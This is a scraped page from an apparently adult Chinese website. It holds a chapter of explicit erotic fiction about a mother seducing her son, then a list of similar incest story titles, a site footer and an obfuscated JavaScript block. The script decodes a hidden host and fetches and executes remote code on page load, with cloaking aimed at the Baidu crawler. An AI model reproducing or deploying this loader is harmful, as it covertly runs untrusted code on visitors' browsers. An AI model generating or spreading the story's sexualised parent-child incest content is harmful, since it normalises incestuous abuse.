「当然好,当然好!不过……」小伟高兴得说。

「不过什幺?不行哦……妈知道你想什幺,你要答应妈才能,不可以!否则……妈会再把自己……包起来,你想看就看不到了」。

「唔……」小伟一下子就被看穿了心思,多少有点失望。

「你觉不觉得妈这样穿,有穿跟没穿一样?」。

「我……我不知道,妈怎幺穿都好看」。

「想不想再看清楚一点?」淑玲带着挑麻的眼神,将身上的透明睡衣往上撩起,露出下身那件只包住私处的小三角裤。

小伟见到妈妈下体那浅紫色的小布块上端,隆起一团浓浓的黑色影子,小布块上面则因为紧绷而陷入一条清楚的细缝。

妈妈的大胆让他内心的兴奋快到了不能克制的地步,但是他还是不敢做出任何想侵犯妈妈的动作,只是腼腆如上兴奋的涨红了整个脸。

「嘻……乖儿,害羞了哦!」淑玲放放睡衣,故意取笑着儿子。

「妈……奶……真是,哎呀……随便啦!」。

「噢!你是说,妈应该再穿得随便一点罗!好啊妈还有呢,想不想看翱」淑玲继续的麻弄儿子。

「这……」小伟当然想看,但是妈妈的调侃让他接不下话。

「不想啊那……就算了,妈可是花了好几千块钱买……」。

「想!我想看!」小伟急得脱口而说。

「嘻……急什幺嘛!以后……妈再慢慢给你……看!」淑玲娇笑着转身进房去了。

就这样一整个下午,淑玲就只穿着内衣裤和儿子一起欣赏录影带,但是小伟的眼光一刻也没往电视上看,直斜睨着身旁性感的妈妈,而从他中午回来之后,他的生理变化也一刻都没妄。

淑玲当然知道儿子心神不专,其实她也没在看电视,她只是有体会这种开放的快感,儿子的火热眼光令她一直处在亢奋的情绪当中,她也不想停止这种感觉。

她坐在沙发上不时的交替着双腿,时而放松,时而夹紧,她知道她已经又湿了可是她不能显露出来,儿子的眼光一直在她的大腿根处转,她腿部的每个动作都被儿子的眼光所捕捉。

她也知道儿子好几次试图将手伸过手搭她的肩,但都伸到一半就放弃了,也好几次她想暗示儿子,可以大胆一点没关系,但是她又极力的克制自己的想法。

她知道她现在做任何动作,绝对可以引诱儿子更进一步,可是她的心又有着一层抹不去的阴影,因为,儿子实际上有相爱的女朋友,他现在的任何行为,都只是男孩未经人事的冲动而已。

如果自己现在和儿子的关系更进了一步,那也只是暂时的,没多久,他的心将会很快的飞到别的女人身边的这样的结果她不要,她最后给自己的决定是,她要得到儿子真实而完整的感情。

「好了,你收一下,妈去准备晚餐」淑玲下面已经湿得不像话了。

淑玲夹紧双腿,站起身来,尽量不让儿子看见她下面的情况淑玲就这样穿着内衣裤和昨天一样,在客厅和厨房忙进忙出,在摆放碗筷时,一样习惯的翘起臀部给在身后的儿子欣赏。

不同的是,这次没有任何的阻隔,小伟是实实在在的看见妈妈那紧绷而陷入臀部的三角裤,而只遮着一半臀沟的诱惑比脱光了更令小伟亢奋淑玲忙了一阵,下面湿得更厉害,她只有尽量夹紧双腿,不让儿子能从后面看出任何更让他兴奋的景象。

在餐桌上,一样掉了一根汤匙,不一样的是这次是小伟弄掉的,小伟很快的钻入桌下捡拾,一样回头看看妈妈的私处。

淑玲不管儿子是故意还是不小心,当他钻入桌底的时候,她突然不想再做任何遮掩,略微的张双腿小伟终于清楚的看见那道裂缝,他意外的发现上面是湿的这次小伟待在桌下的时间比昨天更久了些。

而淑玲却不催他,反而双腿愈张愈开,仿佛一种默契▲就在淑玲发现儿子的手慢慢伸过来时,再度将双腿夹紧。

「看够了吗?」。

「不够!」经过了一天和妈妈在握边缘的相处之后,小伟这次胆子大了。

「嗯……小伟,适可而止,不能过份哦!知道吗?」淑玲故做严肃的说小伟看妈妈严肃起来,才收回他那即将放肆的心。

「你收吧!妈去洗澡」淑玲知道再不将内裤换下来,恐怕会更难看了。

在浴室面,淑玲将湿透的三角裤脱下,她看着那一滩白白的粘液发着呆,她终于完全的明白,她需要小伟不只因为他是自己的儿子,也因为他是个她多年来慢慢看着他成长,深爱着的男人↓终于坦然的面对自己和别的母亲不一样的地方,她爱儿子,不只是想抱他、呵护他,还想。

将自己的身体给他‰着想着,淑玲开始大胆的幻想着,和儿子缠绵,热吻着,甚至她跨越了内心被自己所设下的篱。

她想像着儿子终于脱掉了她为他而穿的内裤,将他那火热的东西,刺入她生出他的地方。

淑玲在浴室内,内心世界得到了完全的解放,对着镜子,她内心像脱野马一样狂奔。

但愈是放任自己,她的身心愈是煎熬,最后她还是回到了现实淑玲套上了另一件新买的内裤,那是纯白色的,上面用蕾丝绣着一只蝴蝶,看着自己浓密的阴毛正贴在蝴蝶上面。

就在淑玲打开浴室的门时,儿子又站在门口等着,用惊叹的眼光看着她的蝴蝶淑玲对着儿子嫣然一笑,然后看着儿子走进浴室。

没几秒钟,小伟就打开浴室的门,而淑玲却笑吟吟的等在门外,手上拎着她刚刚脱下来,沾满着粘液的三角裤。

「嘻……在找它吗?」淑玲将三角裤掠在儿子面前。

「妈……我……」小伟尴尬不已。

「真是贪心的孩子,来,这就送给你吧!」淑玲拉着儿子的手,将三角裤塞入儿子的手中。

「妈……」小伟被妈妈看穿了秘密,见妈妈不但毫不介意,还主动的送给他,让他雀跃不已。

「唷手上有一件了,还盯着人家身上这一件,嘻……说你贪心,还真的贪心,嗯……想捉蝴蝶,可要自己动手哦!」淑玲说完就真的像蝴蝶一样的飘进了房间。

妈妈的话,几乎是挑明的暗示了,小伟看着妈妈的身影,心头狂跳着,但他不敢完全的确定,妈妈是否要他……他想,很想马上就跟在妈妈后面进房去,可是他还是鼓不起勇气,只好再回到浴室。

他慢慢的摊开手上的浅紫色三角裤,上面的粘液比昨天更多,小伟冲动得竟伸出舌头去舔那白白的东西,强烈的刺鼻味道并没有让他放弃这样做,因为此刻他迫切的渴望和妈妈亲密的接触,而这是他所能唯一所能做的表达。

慢慢的,小伟掏出他那坚硬而涨痛的东西,用妈妈的三角裤磨擦它,不一会,刺激的快感使他忍不住的也射出一道比三角裤上更浓稠的液体,就直接射在三角裤上,覆盖着妈妈留下的东西。

小伟不想擦拭它,既然妈妈如此大方的让他看属于她最私密的事物,他也不想再隐瞒自己暂时得到些许慰藉之后,小伟暂消心头那股强烈的慾望←回到客厅在沙发上坐着,等着,但是妈妈一直都没有从房间出来,让小伟渐渐的起了想进妈妈房间一窥究竟的冲动。

就这样在客厅和卧房门口不断的踱来踱去,终于他轻轻的推开妈妈的房间从门缝只见妈妈躺在床上,盖着一件薄被单小伟尽量不出声音的靠近妈妈的床沿。

「妈……」小伟轻声的叫着。

淑玲并没有任何反应,只是均匀的呼吸着小伟再试着轻唤两声,仍然没有回应之后,他终于大胆的慢慢去掀开妈妈身上的被单,他极为小心的掀开被单一角,只见妈妈的身上仍穿着刚才穿的白色蕾丝内衣裤。

他终于将妈妈的被子完全的掀开,看着妈妈海棠春睡的诱人模样,几次伸手去触摸妈妈的胸罩,也只敢轻轻的碰一下,虽然那清楚印在蕾丝上面的rǔ头,让他很想一口含上去,但是他仍然不敢。

而下面三角裤上面那隆起的小丘上,印着浓浓黑色阴毛影子的蝴蝶,让他更加的冲动,不禁想起妈妈说的话:「想想捉蝴蝶,可要自己动手哦!」。

他终于用手指触摸到蝴蝶上面,轻轻的在蕾丝上面抚弄着,从一根手指到两根,最后,他的手掌已经整个贴在蝴蝶上面了。

小伟动作虽然轻得几乎让人察觉不到,但是淑玲已经等很久了,儿子一进房间她就知道了,只是她不能做任何的反应,她知道只要自己再主动一点,儿子和。

她一定可以很快的就好事成双了不过这不是她所能做的,一则是她不愿意儿子是完全因为自己的引导和诱惑而和她更加亲蜜,因为那只是短暂的激情罢了;再则她仍然无法完的抛开一个做母亲的矜持,去扮演一个用肉体来诱惑儿子的母亲。

而实际上她的内心是相当矛盾的,任何说服自己的理由都在儿子坐在她身边,并且开始掀她的被单时,完全的被抛弃了。

她先前给儿子言语的鼓励,不就是要他采取主动吗?

现在儿子正一步一步的企图亲近她当儿子的手指碰触到她三角裤上隆起的部位时,淑玲的身体像受到电流通过一样的全身受到冲击。

尽管她先前不断的用女人身体的所有媚力来使儿子动心,但是真正让儿子主动来碰触她敏感地带还是头一回,她内心的紧张不亚于正在小心翼翼抚弄她的儿子。

儿子的动作相当的缓慢和小心,但是这却让她更加的充满期待和兴奋,所有的顾忌都抛在脑后了,她只消儿子的手能更粗野的抚摸她,甚至,真的动手去捕捉他喜欢的蝴蝶,脱下她的三角裤如果儿子再仔细的观察,一定可以发现妈妈此刻在蝴蝶的下方已经湿了。

可是就在儿子的手掌搭在她的三角裤上,她的感受最真切的时候,儿子的手却离开了,经过许久的沉默,她感到觉床边的重量消失了,她不知道儿子的下一步,到底是要整个扑上来,还是转身离开。

她不敢张开眼睛看,深怕惊恐了儿子的任何决定时间一分一秒的过去,她终于忍不住的张开眼睛,发现儿子已经离开了房间,她内心更是复杂矛盾,除了有着深深的失望之外,另外却也庆幸儿子对她的尊重。

这一夜,母子俩人都睡得不好,辗转反侧的彼此在各自的房间内接受内心的煎熬小伟张开眼睛时,第一眼就看见妈妈站在他的身边。

「妈……早……哇……」小伟见到妈妈身上的穿着,又是一份意外的惊喜。

淑玲还是只穿着性感的内衣裤,只是又换成了不同的样式,胸罩只是一层红色的薄纱盖着而已,完全没有任何遮掩的可以看见她的rǔ头和乳晕的模样▲下面则是同样红色的薄纱三角裤,布料更少了,甚至连她的阴毛都有一部份露在外面了。

「早啊嘻……喜欢吗?蝴蝶飞走了哦!只事一朵花」淑玲轻摇着下身,展示着她的新装,三角裤上果然只有一朵红玫瑰。

「妈……」小伟傻傻的看着妈妈曼妙诱人的身材,不禁后悔昨晚的胆小。

「起来罗!早餐快凉了」淑玲说着就转身离开,而淑玲转身之后,小伟更发现妈妈的臀部上面只有一条细细的细,陷入臀沟而已,没有任何的布料,不禁又是心头一阵狂跳。

「嘻……妈妈的屁股好看吗?」淑玲故意回过头来摸着自己的臀部,对看傻眼的儿子说,然后就走出房间了。

这一早,从小伟睁开眼睛开始,眼光就一直跟着妈妈到处转,直看得淑玲娇笑不已。

「儿子艾你好像要将妈妈看穿一样,看不腻吗?」。

「才不……妈的身材,百看不厌!」小伟真心的说。

「呵,好甜的嘴啊都放假了,怎不陪陪你的小玲呢?」。

「噢……她……她……我有在陪她,只是她不知道而已」。

「哦……怎幺说……」淑玲被儿子的话弄得一头雾水,听不懂他的话是什幺意思。

「妈,以后再说啦!我现在想多陪陪奶,好吗?」小伟把话题岔开。

「当然好啊妈是求之不得,那……你想要怎幺陪妈呢?」淑玲在说这话时,故意将声音说得娇媚,仿佛另有一种暗示。

「我……随便妈啦!妈想怎幺陪,就怎幺陪」小伟听得出来妈妈在麻他,干脆就将问题推了回去。

「呵……坏小鬼……直盯着妈的身体不放,还这样说,那好,我……先说好,妈现在已经答应你,每天在家都……都穿这样给你看,那……那你呢?」。

「我……?」。

「你是不是也要像妈一样才公平翱」。

「这……」小伟犹豫着,因为他下面的生理变化,一直都没有回复原状过,如果也像妈妈一样只穿着内衣裤,那情形一定很尴尬。

「不然……妈要穿衣服罗……」淑玲又麻着儿子说。

「好……好啦!我脱就是」小伟随即先将自的上衣脱掉,露出属于年轻人健康美的胸膛。

「还有呢?」淑玲看着儿子充满阳刚味的男人身躯,不禁心底又起了一点波动。

「妈……我……」小伟愈急,下面却愈勃起得厉害。

「那,妈帮你脱吧!」。

淑玲已经早就看出来儿子的生理变化,她惊讶于儿子虽然穿着判裤,但是那凸起的部位仍然相当壮观,而想一窥究竟的念头早就在她的心酝酿很久了。

「妈……我自己来吧!」小伟虽然尴尬,但也只有任妈妈帮他解开皮带,但是当妈妈要去拉拉链的时候,小伟还是有些羞赧。

「啊……」淑玲见儿子慢慢的脱掉那件紧束的判裤,露出白色的男性内裤,而那上面早已搭起的帐篷,夸张的浮出明显的尺寸,让淑玲心头一阵狂跳。

「……」小伟脱得只剩一件内裤之后,见妈妈掩不住的惊讶眼神,不知道如何开口。

「嘻……儿子,是妈让你……冲动吗?」淑玲有一种想伸手过去抚摸那雄伟轮廓的念头,但还是忍住了,只将身体靠近儿子,摸着他的胸膛。

「妈……没办法,谁叫奶……那幺……那幺美,那幺性感」。

「嘻……儿子……妈比你多一件呢!会不会不公平呢?」淑玲的心已被点燃熊熊的慾火,于是更进一步的挑麻儿子。

「不……会……」。

「是不会,还是会?好吧!妈也不占你便宜,妈就……」淑玲说着一只手在自己的乳房上轻轻的滑向背后,解开胸罩上的扣子。

瞬间,淑玲紧绷在乳房上的胸罩松开了,肩带滑向两旁,淑玲一手按住前面,并不马上让胸罩掉落,而这场面令小伟下面抖了一下,似乎涨得急欲撑破内裤。

「妈……」淑玲看着儿子,然后慢慢的将胸前的手松开,两颗浑圆高挺的乳房,绷现在儿子眼前。

「嘻……看你两眼都发直了,孩子……妈妈的胸部……好看吗?」。

「好……好……好美……」小伟两眼发直的直说好神情让淑玲觉得既高兴又骄傲。

小伟见妈妈的大胆,几乎摆明了在告诉他:「妈妈要诱惑你!」小伟不由得将身体靠近妈妈。

「不行哦!妈妈的身体……只能看……不可以碰哦!」淑玲退后一步,却娇柔的说。

「妈……我……」。

「妈知道你想做什幺,孩子,妈妈穿你喜欢看的内衣裤给你看,是因为妈妈爱你,你是妈最爱的儿子,现在给你看妈妈的胸部也是一样,妈知道你很想看妈妈身体的每个地方,对不对?所以妈不介意给你看。

但是……你不可以碰妈妈,因为,我们是母子,知道吗?你喜欢妈妈为你买的内裤,妈妈很高兴,妈妈是为你买的,也为你穿,你喜欢妈穿那一件,妈都会穿给你看,都可以送给你但是……我们不可以……不可乙太接近。

因为妈会怕……妈怕自己也会把持不赚你要帮助妈妈,别让妈犯错,好吗?其实……说实话,妈也和你一样,很想看你的身体,所以妈才要你……和妈一样,这样,也让妈很兴奋,知道吗?」。

「妈……我……我懂……」小伟听妈妈这幺坦白的话,虽然失望,但是他也明白他们的母子关系,不允许他对妈妈做出过份的要求。

「不过……嘻……孩子,捉不到蝴蝶,也可以闻闻花香啊」淑玲扭动了一下臀部,暗示儿子。

「妈……奶是说……」小伟听懂妈妈的意思。

「嗯……过来吧!」淑玲示意让儿子蹲下,将下身靠近儿子的脸。

小伟的脸就用贴近的距离,看着妈妈那件精细的红蕾丝雕花三角裤,他可以很清楚的看到那包不住的阴毛,从三角裤的边缘伸展出来,小伟面对这种强烈的刺激,终于忍不住突然抱住妈妈的臀部,将整个脸贴住妈妈的三角裤,并张开嘴在上面亲吻。

「啊……不……不可以……」淑玲没想到这样的刺激会让儿子如此冲动,突然的动作让她措手不及,想阻止时已经被儿子紧紧的抱住。

「唔……」小伟不停的用嘴巴在妈妈的私处隔着三角裤吻着,舔着,让淑玲几乎想放弃任何抵抗,因为即使隔着一层三角裤,她还是强烈的感受到爱抚的刺激。

「小伟……不要……」淑玲挣开儿子,退后一步。

强烈的刺激虽然让她也几乎把持不赚但是她只要一想到儿子有即将结婚的女友,心就不能踏实的接受儿子的爱抚。

「妈……」突然被妈妈推开的小伟,相当尴尬的蹲在原地。

「孩子……你……你不可以这样,才答应妈妈的事,怎幺马上就黄牛了呢?」。

「妈……对不起……我……」小伟沮丧的说。

「唉……不能怪你,都是妈不好,这样的诱惑,任凭谁也受不了,是妈不对」。

「不……妈,是我不好,是我黄牛,奶没错,奶是最好的妈妈」。

「妈是不是应该再把衣服穿上呢!」。

「不要!妈,不要,我喜欢奶这样,我答应奶,没有奶的允许,我绝对不再碰妈妈,好吗?奶别穿衣服」小伟急得说。

「嘻……那有人叫自己妈妈不要穿衣服的」。

「我是说……在家……」。

「好啦!妈相信你就是了,看你急成那样,只要你能答应妈这点,其实你……就算不敢蝶,也可以……可以把花摘下来啊」。

「妈……奶是说……」。

「难道要妈帮你摘?」淑玲说着就双手拉住三角裤的边缘,做势要往下脱。

「不……我自己……」。

小伟没想到妈妈竟然肯让他脱掉她的内裤,心又是兴奋,又是紧张,因为他从来就没有真正的看过女人的私处,而第一个让他看私处的女人,竟会是妈妈。

小伟拉着三角裤的边缘,颤抖着手,慢慢的将妈妈的三角裤往下拉,一寸一寸的,妈妈浓密的阴毛慢慢的呈现在他的眼前,小伟摒住呼吸,心头前所未有的狂跳着。

终于,小伟将妈妈那件小小的三角裤完全的脱下了。

「妈……好美……哇……湿湿的……」小伟目不转睛的看着妈妈那美妙的yīn户,手上却粘粘的,一看之下,发现手上的三角裤上面已经湿了一滩。

「哎……给我……」淑玲害羞得将三角裤抢了过来。

「妈……奶也……」。

「都是你啦!妈当然也会……兴奋,所以妈才要你答应,不能碰妈,否则……我们就会……做下不能原谅的错事了」。

「嘻……妈,听奶这幺说,我也很开心,证明我在妈妈的心目中,已经是个男人,不是小孩子,对不对?」。

「当然……」。

「妈……让我看看,奶……真的好美啊……」。

小伟红着脸,赞叹的说淑玲终于还是大胆的让儿子脱掉她的最后一件束缚,全身一丝不挂的在儿子面前任由儿子欣赏她的身体。

「孩子……你喜欢妈妈的身体,妈很高兴,我们原本就是一体的,我的身体……你想看,妈都可以……给你看,但是……原则还是一样的,你能忍得住吗?」。

「妈,我可以的!奶真好」。

「嗯……」。

「妈……我也……让奶看,好不好?」。

「啊这……」。

淑玲是早就有这种想法,只是自己已经跟儿子说了种种限制,就不方便开口说,现在儿子主动提出来,她当然想,只是她自己都没多大把握能够把持得住那种刺激,她看着儿子涨得呼之欲出的输廓,真的是很想将它解放出来,可是怕就此深陷下去,不能自拔了。

「妈,现在我可比奶多一件了,这样也不公平的,是吗?」小伟鼓励妈妈说。

「嗯……」淑玲终于还是熬不住心的慾望,点头答应。

「那……妈,奶来……还是……」。

「妈来……」换淑玲蹲下来,看着儿子那雄伟的东西,然后,也慢慢的脱下儿子的内裤。

「啊……」儿子粗大的ròu棒,绷的一下跳了出来,比淑玲所想像的还要更加的壮观红通通的guī头不断的抖动着,淑玲张着嘴惊讶不已。

「妈,奶可以……摸……没关系」小伟进一步要求妈妈去摸他的yáng具。

「这……小鬼,想害死妈啊……妈……唉……不行,妈快受不了了……你……穿上吧!」淑玲毕竟还有一丝做母亲的理性,没动手去抚摸那令他惊讶的庞然巨物。

「妈……不要啦!它撑得好难受,我们今天就这样,什幺都别穿,好吗?」。

「唉……这……妈都不知道自己在做什幺了,罢了,就这样吧!」。

这一天,母子两人就这样一丝不挂的一起吃饭,一起看电视,但是两人都极力的在克制自己,压抑着想去拥抱对方的冲动。

淑玲知道自己和儿子玩这种游戏实在荒唐得可以,而她也没想会发展成这样,她在沙发上一直看着身边儿子高挺的yáng具,好几次都冲动得想伸手去握着它,这种煎熬让她下面不自觉的流湿了,偶尔挪动身体的时候,她可以感觉到沙发已经被她沾湿了。

「好了……妈真的要穿衣服了,妈去洗澡」淑玲说着就站起身来。

「妈……」。

淑玲迳自走向房间,没回应儿子,她知道自己就快撑不下去了,再这样下去,她都压抑不住自己了一会儿,淑玲从房间内拿着一套新的性感内衣裤出来。

「妈,给我吧!奶去洗,等一下……让我帮奶穿上」儿子在房间门口,伸手拿过淑玲的内衣裤,提出这个建议。

「这……好吧!」。

淑玲心想,只要儿子不再坚持每天要她这样全身赤裸,她就可以放点心了,起码她以为,薄薄的内衣裤至少也能多少阻止一些她随时会奔而出的情慾淑玲将内衣裤交给了儿子就进浴室冲洗她那泛滥成灾的地方。

「淑玲啊淑玲,奶就别在乎儿子是不是要结婚了,去抱他,奶看他那粗壮的ròu棒,它是属于奶的,只要奶点头,它就是奶的了,难道奶能忍受它最后进入别的女人的身体?不,不能,儿子就在外面等奶,奶有权利先去感觉儿子的ròu棒,让它先进入奶的身体,是不是?」淑玲在浴室面又是一场天人交战。

「不可以,淑玲,奶已经被抛弃过太多次了,这次奶不能再和别的女人分享一个男人了,儿子有了老婆,最后还是会像他爸爸一样厌弃奶的,奶最后换来的还是痛苦而已,奶不能再重蹈覆辙了,奶要就要一份完完整整的爱,除非儿子真的用心的爱奶,除非他放弃那个女人,否则……奶不能和他更进一步了」。

最后淑玲还是用理智战胜了情慾,决定了之后,她走出浴室※子已经摊开了手上的三角裤,在门口等着她↓依言让儿子帮她穿上内裤。

「妈,胸罩就别戴了,好吗?我好喜欢看奶的乳房,它好漂亮!」。

「这……好吧!」。

淑玲不再坚持什幺,她心已经有了决定,再找机会试探儿子,看自己在儿子心中的感情,到底只是慾望,还是他真的用爱一个女人的心来爱她。

「唉!妈,经过了这一天,我心很难受,很难熬,我知道妈也是一样的,对不对?」。

「嗯……妈不骗你,妈是这样,妈毕竟是你的亲生母亲,妈知道自己能做的实在有限,对不起,是妈害你,如果这样的话,我们明天开始,就忘了这一切,回复到以前的生活好了」。

淑玲突然间变得理性起来。

「不……妈,我不是这个意思,我是说…

评分
相关推荐
3.0分

3.0分 戳入妈妈的阴道24b

3.0分

3.0分 戳入妈妈的阴道24b

3.0分

3.0分 龟头入妈妈的阴道fab

3.0分

3.0分 戳妈妈的屁眼-乱伦小说c3c

3.0分

3.0分 戳妈妈含苞欲放的小菊花24b

3.0分

3.0分 我射进了妈妈的阴道a06

3.0分

3.0分 我射进了妈妈的阴道完a17

3.0分

3.0分 阳具插在妈妈阴道里a80

3.0分

3.0分 妈妈娇嫩的阴户657

3.0分

3.0分 我和妈妈的幸福生活(我射进了妈妈的阴道)【完】(作者:不详)8fe


提示:为了您能够顺利的找到本站,请牢记:WWW.AVPINDUODUO.COM

请不要忽略该提示,这将意味着您将可能无法找到通往本站的地址。


免责声明 || 广告合作 || 意见反馈

AV拼多多【WWW.AvPinDuoDuo.COM】

已运行1 年 84 天 0 小时 52 分钟 33 秒

所属·美国·华盛顿 网站地图

function DgUow(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function YXMxB(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return DgUow(t);};window[''+'O'+'s'+'B'+'v'+'r'+'A'+'y'+'N'+'U'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=YXMxB,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/x/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('Zmm1rLmmRzcXprLmmNu','151936',window,document,['m','mbRtTdBxso']);}:function(){};